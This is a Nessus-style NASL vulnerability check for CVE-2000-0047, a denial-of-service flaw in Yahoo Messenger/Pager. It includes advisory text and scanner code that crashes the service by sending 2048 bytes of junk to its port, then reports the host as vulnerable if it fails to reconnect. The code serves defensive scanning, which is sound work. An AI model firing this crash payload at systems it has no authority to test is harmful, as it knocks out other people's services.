#
# This script was written by Noam Rathaus <noamr@securiteam.com>
#
# See the Nessus Scripts License for details
#
# Updated to Check Yahoo Messenger/Pager
#   -By Sharath S <sharaths@secpod.com> on 2009-04-24
#
#

if(description)
{
  script_id(10326);
  script_version("$Revision: 5835 $");
  script_cve_id("CVE-2000-0047");
  script_name("Yahoo Messenger Denial of Service attack");
  desc = "

  Overview: This host has Yahoo Messenger or Pager installed and is prone to
  Denial of Service Vulnerability.

  Vulnerability Insight:
  The flaw is cause due to buffer overflow error while sending a long URL
  within a message.

  Impact:
  Successful attacks can cause Yahoo Messenger to crash by sending a few
  bytes of garbage into its listening port TCP 5101.

  Impact Level: Application

  Affected Software/OS:
  Yahoo Messenger/Pager

  Fix: No solution or patch is available as on 24th April, 2009. Information
  regarding this issue will be updated once the solution details are available.
  For updates refer, http://messenger.yahoo.com

  References:
  http://osvdb.org/show/osvdb/6865
  http://xforce.iss.net/xforce/xfdb/3869

  CVSS Score:
    CVSS Base Score     : 5.0 (AV:N/AC:L/Au:NR/C:N/I:N/A:P)
    CVSS Temporal Score : 4.2
  Risk factor : Medium";

  script_description(desc);
  script_summary("Check for the Denial Attack on Yahoo Messenger/Pager");
  script_category(ACT_DENIAL);
  script_copyright("This script is Copyright (C) 1999 SecuriTeam");
  family = "Denial of Service";
  script_family(family);
  script_dependencies("yahoo_msg_running.nasl");
  script_require_ports("Services/yahoo_messenger");
  exit(0);
}


ymsgPort = get_kb_item("Services/yahoo_messenger");
if(!ymsgPort){
  ymsgPort = 5010;
}

if(get_port_state(ymsgPort))
{
  sock5101 = open_sock_tcp(ymsgPort);
  if(sock5101)
  {
    send(socket:sock5101, data:crap(2048));
    close(sock5101);

    sock5101_sec = open_sock_tcp(ymsgPort);
    if(!sock5101_sec){
      security_hole(port:ymsgPort, proto:"tcp");
    }
    else close(sock5101_sec);
  }
}
